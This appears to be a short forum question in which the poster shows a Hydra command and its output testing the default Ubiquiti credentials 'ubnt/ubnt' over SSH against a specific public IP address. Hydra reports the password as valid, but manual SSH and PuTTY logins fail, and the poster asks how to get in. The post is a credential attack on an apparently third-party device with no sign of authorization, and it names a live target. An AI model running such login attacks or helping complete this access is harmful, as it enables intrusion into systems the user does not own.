# Hydra attack ssh : The message is successful, but when using the errors

Tags: ssh, hydra

I execute the command

```
hydra -l ubnt -p ubnt 138.255.252.193 -t 4 ssh
```

I get the message it's successful

```
Hydra (http://www.thc.org/thc-hydra) starting at 2021-02-22 11:32:05
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://138.255.252.193:22/
[22][ssh] host: 138.255.252.193   login: ubnt   password: ubnt
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-02-22 11:32:07
```

But when you visit

putty -l ubnt -pw ubnt 138.255.252.193
ssh ubnt@138.255.252.193

I can not access.

```
Due to "Login incorrect" or "Access denied" reasons
```

Please tell me the possible reason? And how to fix it